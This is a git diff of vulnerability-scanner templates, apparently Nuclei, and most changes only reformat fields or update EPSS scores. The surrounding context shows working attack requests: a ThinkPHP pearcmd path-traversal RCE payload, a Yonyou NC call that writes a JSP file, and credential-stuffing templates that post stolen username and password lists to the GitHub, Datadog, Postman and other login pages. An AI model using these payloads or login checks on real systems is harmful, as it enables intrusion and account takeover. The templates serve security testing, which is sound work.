b/http/cnvd/2022/CNVD-2022-03672.yaml index 81f3ababb6..050f771bf2 100644 --- a/http/cnvd/2022/CNVD-2022-03672.yaml +++ b/http/cnvd/2022/CNVD-2022-03672.yaml @@ -12,11 +12,11 @@ info: - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: cnvd,cnvd2020,sunflower,rce metadata: max-request: 2 + tags: cnvd,cnvd2020,sunflower,rce http: - raw: @@ -37,7 +37,6 @@ http: group: 1 regex: - '"verify_string":"(.*?)"' - req-condition: true matchers: - type: dsl diff --git a/http/cnvd/2022/CNVD-2022-42853.yaml b/http/cnvd/2022/CNVD-2022-42853.yaml index f094d24bac..f3c5a5084a 100644 --- a/http/cnvd/2022/CNVD-2022-42853.yaml +++ b/http/cnvd/2022/CNVD-2022-42853.yaml @@ -11,15 +11,14 @@ info: - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"zentao" fofa-query: "Zentao" tags: cnvd,cnvd2022,zentao,sqli - variables: num: "999999999" diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml index 8c24236126..fca81d8ce4 100755 --- a/http/cnvd/2022/CNVD-2022-43245.yaml +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -7,9 +7,9 @@ info: description: | e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information. metadata: + verified: true max-request: 1 fofa-query: app="泛微-协同办公OA" - verified: true tags: cnvd,cnvd2022,weaver,e-office,oa,lfi http: @@ -38,4 +38,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cnvd/2022/CNVD-2022-86535.yaml b/http/cnvd/2022/CNVD-2022-86535.yaml index 5abd0dfd25..be6323f326 100644 --- a/http/cnvd/2022/CNVD-2022-86535.yaml +++ b/http/cnvd/2022/CNVD-2022-86535.yaml @@ -11,8 +11,8 @@ info: - https://blog.csdn.net/qq_60614981/article/details/128724640 - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535 metadata: - max-request: 3 verified: true + max-request: 3 tags: cnvd,cnvd2022,thinkphp,rce http: @@ -20,12 +20,10 @@ http: - | GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 Host: {{Hostname}} - - | GET / HTTP/1.1 Host: {{Hostname}} think-lang: ../../../../../usr/local/php/pearcmd - - | GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1 Host: {{Hostname}} diff --git a/http/cnvd/2023/CNVD-2023-08743.yaml b/http/cnvd/2023/CNVD-2023-08743.yaml index 85f218ec33..8f621418f2 100644 --- a/http/cnvd/2023/CNVD-2023-08743.yaml +++ b/http/cnvd/2023/CNVD-2023-08743.yaml @@ -9,8 +9,8 @@ info: - https://www.henry4e36.top/index.php/archives/162.html - https://blog.csdn.net/qq_41904294/article/details/130944159 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="人力资源信息管理系统" tags: cnvd,cnvd2023,hongjing,hcm diff --git a/http/cnvd/2023/CNVD-2023-12632.yaml b/http/cnvd/2023/CNVD-2023-12632.yaml index d853063508..68cac836a9 100644 --- a/http/cnvd/2023/CNVD-2023-12632.yaml +++ b/http/cnvd/2023/CNVD-2023-12632.yaml @@ -10,15 +10,14 @@ info: - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003 - https://blog.csdn.net/qq_50854662/article/details/129992329 metadata: - max-request: 1 verified: true - fofa-query: app="泛微-协同商务系统" + max-request: 1 shodan-query: 'ecology_JSessionid' + fofa-query: app="泛微-协同商务系统" tags: cnvd,cnvd2023,ecology,sqli # a' union select 1,''+(SELECT md5(9999999))+' # URL encoded 3 times - http: - raw: - | diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml index 19c3f621e3..76adefaaee 100644 --- a/http/cnvd/2023/CNVD-C-2023-76801.yaml +++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml @@ -7,7 +7,7 @@ info: description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks. metadata: max-request: 2 - tags: cnvd,cnvd2023,yonyou,rce + tags: cnvd,cnvd2023,yonyou,rce,intrusive http: - raw: @@ -19,7 +19,6 @@ http: {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig", "parameterTypes":["java.lang.Object","java.lang.String"], "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]} - - | GET /{{randstr_1}}.jsp HTTP/1.1 Host: {{Hostname}} diff --git a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml index 6a6e3c6f7d..a4cfd832df 100644 --- a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml +++ b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml @@ -1,5 +1,5 @@ -id: atechmedia-codebase-login-check - +id: atechmedia-codebase-login-check + info: name: Atechmedia/Codebase Login Check author: parthmalhotra,pdresearch @@ -10,46 +10,47 @@ info: metadata: max-request: 2 tags: login-check,atechmedia,codebase,creds-stuffing -self-contained: true -http: - - raw: - - | - GET https://identity.atechmedia.com/login HTTP/1.1 - Host: identity.atechmedia.com - Referer: https://identity.atechmedia.com/login - - - | - POST https://identity.atechmedia.com/login HTTP/1.1 - Host: identity.atechmedia.com - Origin: https://identity.atechmedia.com - Content-Type: application/x-www-form-urlencoded - Referer: https://identity.atechmedia.com/login - - utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login - - - cookie-reuse: true - extractors: - - type: xpath - name: authenticity_token - part: body - attribute: value - internal: true - xpath: - - /html/body/div/div[2]/div/form/input[2] - - - type: dsl - dsl: - - username - - password - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Set-Cookie: user_session' - - - type: status - status: - - 302 + +self-contained: true + +http: + - raw: + - | + GET https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + Referer: https://identity.atechmedia.com/login + - | + POST https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + Origin: https://identity.atechmedia.com + Content-Type: application/x-www-form-urlencoded + Referer: https://identity.atechmedia.com/login + + utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login + + cookie-reuse: true + + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div[2]/div/form/input[2] + + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: user_session' + + - type: status + status: + - 302 diff --git a/http/credential-stuffing/cloud/atlassian-login-check.yaml b/http/credential-stuffing/cloud/atlassian-login-check.yaml index d2b3b5cd58..a35350d736 100644 --- a/http/credential-stuffing/cloud/atlassian-login-check.yaml +++ b/http/credential-stuffing/cloud/atlassian-login-check.yaml @@ -12,6 +12,7 @@ info: tags: login-check,atlassian,creds-stuffing self-contained: true + http: - raw: - | @@ -28,8 +29,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml index 4ed8b20196..2bcd4bc48e 100644 --- a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml +++ b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml @@ -12,6 +12,7 @@ info: tags: login-check,avnil-pdf,creds-stuffing self-contained: true + http: - raw: - | @@ -38,4 +39,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/credential-stuffing/cloud/chefio-login-check.yaml b/http/credential-stuffing/cloud/chefio-login-check.yaml index 8e80b3607e..69dea49e06 100644 --- a/http/credential-stuffing/cloud/chefio-login-check.yaml +++ b/http/credential-stuffing/cloud/chefio-login-check.yaml @@ -1,4 +1,5 @@ id: chefio-login-check + info: name: Chef.io Login Check author: parthmalhotra,pdresearch @@ -11,6 +12,7 @@ info: tags: login-check,chefio,creds-stuffing self-contained: true + http: - raw: - | @@ -29,4 +31,4 @@ http: - type: status status: - - 302 \ No newline at end of file + - 302 diff --git a/http/credential-stuffing/cloud/codepen-login-check.yaml b/http/credential-stuffing/cloud/codepen-login-check.yaml index 0e59611a93..1a324817da 100644 --- a/http/credential-stuffing/cloud/codepen-login-check.yaml +++ b/http/credential-stuffing/cloud/codepen-login-check.yaml @@ -1,4 +1,5 @@ id: codepen-login-check + info: name: codepen.io Login Check author: parthmalhotra,pdresearch @@ -11,12 +12,12 @@ info: tags: login-check,codepen,creds-stuffing self-contained: true + http: - raw: - | GET https://codepen.io/login HTTP/1.1 Host: codepen.io - - | POST https://codepen.io/login/login HTTP/1.1 Host: codepen.io @@ -30,12 +31,14 @@ http: dsl: - username - password + - type: xpath part: body xpath: - '//input[@name="authenticity_token"]/@value' name: token internal: true + matchers-condition: and matchers: - type: word @@ -43,6 +46,7 @@ http: negative: true words: - 'The username or password you entered is incorrect, please try again.' + - type: status status: - - 302 \ No newline at end of file + - 302 diff --git a/http/credential-stuffing/cloud/datadog-login-check.yaml b/http/credential-stuffing/cloud/datadog-login-check.yaml index 37d5ee2adb..bc163060a8 100644 --- a/http/credential-stuffing/cloud/datadog-login-check.yaml +++ b/http/credential-stuffing/cloud/datadog-login-check.yaml @@ -12,12 +12,12 @@ info: tags: login-check,datadog,creds-stuffing self-contained: true + http: - raw: - | GET https://app.datadoghq.com/account/login HTTP/1.1 Host: app.datadoghq.com - - | POST https://app.datadoghq.com/account/login? HTTP/1.1 Host: app.datadoghq.com @@ -25,8 +25,8 @@ http: _authentication_token={{auth_token}}&username={{username}}&password={{password}} - cookie-reuse: true + extractors: - type: regex name: auth_token @@ -40,8 +40,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word @@ -51,4 +51,4 @@ http: - type: status status: - - 302 \ No newline at end of file + - 302 diff --git a/http/credential-stuffing/cloud/docker-hub-login-check.yaml b/http/credential-stuffing/cloud/docker-hub-login-check.yaml index 8a30f80d72..7b0b271076 100644 --- a/http/credential-stuffing/cloud/docker-hub-login-check.yaml +++ b/http/credential-stuffing/cloud/docker-hub-login-check.yaml @@ -12,6 +12,7 @@ info: tags: login-check,docker,creds-stuffing self-contained: true + http: - raw: - | @@ -26,6 +27,7 @@ http: threads: 30 attack: pitchfork + matchers-condition: and matchers: - type: word @@ -46,4 +48,4 @@ http: - type: dsl dsl: - username - - password \ No newline at end of file + - password diff --git a/http/credential-stuffing/cloud/gitea-login-check.yaml b/http/credential-stuffing/cloud/gitea-login-check.yaml index f9a606176d..0a92b97fd8 100644 --- a/http/credential-stuffing/cloud/gitea-login-check.yaml +++ b/http/credential-stuffing/cloud/gitea-login-check.yaml @@ -1,5 +1,5 @@ -id: gitea-login-check - +id: gitea-login-check + info: name: gitea.com Login Check author: parthmalhotra,pdresearch @@ -10,29 +10,31 @@ info: metadata: max-request: 1 tags: login-check,gitea,creds-stuffing -self-contained: true -http: - - raw: - - | - POST https://gitea.com/user/login HTTP/1.1 - Host: gitea.com - Content-Type: application/x-www-form-urlencoded - - user_name={{username}}&password={{password}} - - extractors: - - type: dsl - dsl: - - username - - password - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Location: /' - - - type: status - status: - - 303 \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + POST https://gitea.com/user/login HTTP/1.1 + Host: gitea.com + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&password={{password}} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: /' + + - type: status + status: + - 303 diff --git a/http/credential-stuffing/cloud/github-login-check.yaml b/http/credential-stuffing/cloud/github-login-check.yaml index f7b461b874..7b3bc0ae3e 100644 --- a/http/credential-stuffing/cloud/github-login-check.yaml +++ b/http/credential-stuffing/cloud/github-login-check.yaml @@ -1,5 +1,5 @@ -id: github-login-check - +id: github-login-check + info: name: Github Login Check author: parthmalhotra,pdresearch @@ -10,66 +10,67 @@ info: metadata: max-request: 2 tags: login-check,github,creds-stuffing -self-contained: true -http: - - raw: - - | - GET https://github.com/login HTTP/1.1 - Host: github.com - - - | - POST https://github.com/session HTTP/1.1 - Host: github.com - Origin: https://github.com - Content-Type: application/x-www-form-urlencoded - Referer: https://github.com/login - - commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}} - - cookie-reuse: true - extractors: - - type: xpath - name: authenticity_token - part: body - attribute: value - internal: true - xpath: - - /html/body/div[3]/main/div/div[4]/form/input[1] - - - type: xpath - name: timestamp - part: body - attribute: value - internal: true - xpath: - - /html/body/div[3]/main/div/div[4]/form/div/input[10] - - - - type: xpath - name: timestamp_secret - part: body - attribute: value - internal: true - xpath: - - /html/body/div[3]/main/div/div[4]/form/div/input[11] - - - type: dsl - dsl: - - username - - password - - matchers-condition: or - matchers: - - type: dsl - name: 2fa - dsl: - - "contains(location, 'https://github.com/sessions/two-factor')" - - "status_code==302" - condition: and - - - type: dsl - dsl: - - "contains(to_lower(header), 'set-cookie: logged_in=yes')" - - "contains(to_lower(header), 'set-cookie: user_session=')" - - "status_code==302" - condition: and \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + GET https://github.com/login HTTP/1.1 + Host: github.com + - | + POST https://github.com/session HTTP/1.1 + Host: github.com + Origin: https://github.com + Content-Type: application/x-www-form-urlencoded + Referer: https://github.com/login + + commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}} + + cookie-reuse: true + + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/input[1] + + - type: xpath + name: timestamp + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[10] + + - type: xpath + name: timestamp_secret + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[11] + + - type: dsl + dsl: + - username + - password + + matchers-condition: or + matchers: + - type: dsl + name: 2fa + dsl: + - "contains(location, 'https://github.com/sessions/two-factor')" + - "status_code==302" + condition: and + + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: logged_in=yes')" + - "contains(to_lower(header), 'set-cookie: user_session=')" + - "status_code==302" + condition: and diff --git a/http/credential-stuffing/cloud/postman-login-check.yaml b/http/credential-stuffing/cloud/postman-login-check.yaml index 87ab5ccf18..215356f96e 100644 --- a/http/credential-stuffing/cloud/postman-login-check.yaml +++ b/http/credential-stuffing/cloud/postman-login-check.yaml @@ -1,5 +1,5 @@ -id: postman-login-check - +id: postman-login-check + info: name: Postman Login Check author: parthmalhotra,pdresearch @@ -10,43 +10,45 @@ info: metadata: max-request: 2 tags: login-check,postman,creds-stuffing -self-contained: true -http: - - raw: - - | - GET https://identity.getpostman.com/login HTTP/1.1 - Host: identity.getpostman.com - Referer: https://identity.getpostman.com/accounts - - - | - POST https://identity.getpostman.com/login HTTP/1.1 - Host: identity.getpostman.com - Content-Type: application/json;charset=UTF-8 - X-Csrf-Token: {{csrfToken}} - Origin: https://identity.getpostman.com - Referer: https://identity.getpostman.com/login - - {"username":"{{username}}","password":"{{password}}"} - - cookie-reuse: true - attack: pitchfork - extractors: - - type: xpath - name: csrfToken - part: body - attribute: value - internal: true - xpath: - - /html/body/div/div/div[1]/form/input - - type: dsl - dsl: - - username - - password - - matchers: - - type: dsl - dsl: - - "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')" - - "contains(to_lower(body), 'identity.postman.co/continue')" - - "status_code==200" - condition: and \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + GET https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Referer: https://identity.getpostman.com/accounts + - | + POST https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Content-Type: application/json;charset=UTF-8 + X-Csrf-Token: {{csrfToken}} + Origin: https://identity.getpostman.com + Referer: https://identity.getpostman.com/login + + {"username":"{{username}}","password":"{{password}}"} + + cookie-reuse: true + attack: pitchfork + + extractors: + - type: xpath + name: csrfToken + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div/div[1]/form/input + + - type: dsl + dsl: + - username + - password + matchers: + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')" + - "contains(to_lower(body), 'identity.postman.co/continue')" + - "status_code==200" + condition: and diff --git a/http/credential-stuffing/cloud/pulmi-login-check.yaml b/http/credential-stuffing/cloud/pulmi-login-check.yaml index 69f8611985..a151b6773f 100644 --- a/http/credential-stuffing/cloud/pulmi-login-check.yaml +++ b/http/credential-stuffing/cloud/pulmi-login-check.yaml @@ -1,5 +1,5 @@ -id: pulmi-login-check - +id: pulmi-login-check + info: name: pulmi.com Login Check author: parthmalhotra,pdresearch @@ -10,32 +10,34 @@ info: metadata: max-request: 1 tags: login-check,pulmi,creds-stuffing -self-contained: true -http: - - raw: - - | - POST https://api.pulumi.com/api/console/email/login HTTP/1.1 - Host: api.pulumi.com - Content-Type: application/json - Origin: https://app.pulumi.com - Referer: https://app.pulumi.com/ - - {"emailOrLogin":"{{username}}","password":"{{password}}"} - - extractors: - - type: dsl - dsl: - - username - - password - - matchers-condition: and - matchers: - - type: word - part: body - words: - - pulumiAccessToken - - userInfo - - - type: status - status: - - 200 \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + POST https://api.pulumi.com/api/console/email/login HTTP/1.1 + Host: api.pulumi.com + Content-Type: application/json + Origin: https://app.pulumi.com + Referer: https://app.pulumi.com/ + + {"emailOrLogin":"{{username}}","password":"{{password}}"} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - pulumiAccessToken + - userInfo + + - type: status + status: + - 200 diff --git a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml index 7dd9808c9f..0eaaf8b61e 100644 --- a/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml +++ b/http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml @@ -1,4 +1,5 @@ id: gitlab-login-check-self-hosted + info: name: Gitlab Login Check Self Hosted author: parthmalhotra,pdresearch @@ -7,11 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - fofa-query: product="GitLab" max-request: 2 shodan-query: product:"GitLab Self-Managed" + fofa-query: product="GitLab" tags: login-check,gitlab,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -21,7 +21,6 @@ http: - | GET /users/sign_in HTTP/1.1 Host: {{Hostname}} - - | POST /users/sign_in HTTP/1.1 Host: {{Hostname}} @@ -50,7 +49,6 @@ http: dsl: - username - password - req-condition: true matchers: - type: dsl diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml index 74dfcd3bdb..326e7cf0a9 100644 --- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml +++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml @@ -8,11 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - fofa-query: title="Grafana" max-request: 1 shodan-query: title:"Grafana" + fofa-query: title="Grafana" tags: login-check,grafana,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" diff --git a/http/credential-stuffing/self-hosted/jira-login-check.yaml b/http/credential-stuffing/self-hosted/jira-login-check.yaml index 7bc8059549..8bab148af6 100644 --- a/http/credential-stuffing/self-hosted/jira-login-check.yaml +++ b/http/credential-stuffing/self-hosted/jira-login-check.yaml @@ -8,11 +8,10 @@ info: reference: - https://owasp.org/www-community/attacks/Credential_stuffing metadata: - fofa-query: product="JIRA" max-request: 1 shodan-query: http.component:"Atlassian Jira" + fofa-query: product="JIRA" tags: login-check,jira,creds-stuffing,self-hosted - variables: username: "{{username}}" password: "{{password}}" @@ -33,8 +32,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word @@ -44,4 +43,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index eb403449b2..da08c0ed06 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.09258 - epss-percentile: 0.93895 + epss-percentile: 0.93987 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index e4375cb977..4960a117f7 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.88063 - epss-percentile: 0.9824 + epss-percentile: 0.98306 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 6af54c6cd2..24f46f4369 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2002-1131 cwe-id: CWE-80 epss-score: 0.06018 - epss-percentile: 0.9253 + epss-percentile: 0.92636 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index cefb1e2ae3..844b3b357a 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.02285 - epss-percentile: 0.88244 + epss-percentile: 0.88403 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 9a8d90ed9a..d715531e47 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.83354 + epss-percentile: 0.83545 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index a023ce2b97..312cf06dc6 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other epss-score: 0.02158 - epss-percentile: 0.87895 + epss-percentile: 0.88054 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 95cf0166c9..67f9e3e5cb 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.89376 + epss-percentile: 0.89532 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 1523932118..63a418b5d6 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other epss-score: 0.00294 - epss-percentile: 0.65316 + epss-percentile: 0.65676 cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 44fd20a1ff..a0e1066ea4 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 - epss-percentile: 0.81872 + epss-percentile: 0.82059 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 65247aade2..b6a4fe6201 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2006-2842 cwe-id: CWE-22 epss-score: 0.2925 - epss-percentile: 0.96295 + epss-percentile: 0.96339 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 4e3a181265..550f1e7eff 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.0059 - epss-percentile: 0.75518 + epss-percentile: 0.75807 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index c7015b0ac2..b3e803b43e 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2007-4504 cwe-id: CWE-22 epss-score: 0.01677 - epss-percentile: 0.86094 + epss-percentile: 0.86226 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 8b1892de00..fcc0ccf03d 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.8 cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other - epss-score: 0.14147 - epss-percentile: 0.94981 + epss-score: 0.19583 + epss-percentile: 0.95711 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 2765d841da..07974c8416 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2007-5728 cwe-id: CWE-79 epss-score: 0.02361 - epss-percentile: 0.8841 + epss-percentile: 0.88572 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 046b971242..c0275e4060 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1059 cwe-id: CWE-94 epss-score: 0.01493 - epss-percentile: 0.85218 + epss-percentile: 0.85374 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 98b0b24f00..a0495674e1 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00938 - epss-percentile: 0.81093 + epss-percentile: 0.81306 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 84e9b66b44..2dba60bad9 100644 --- 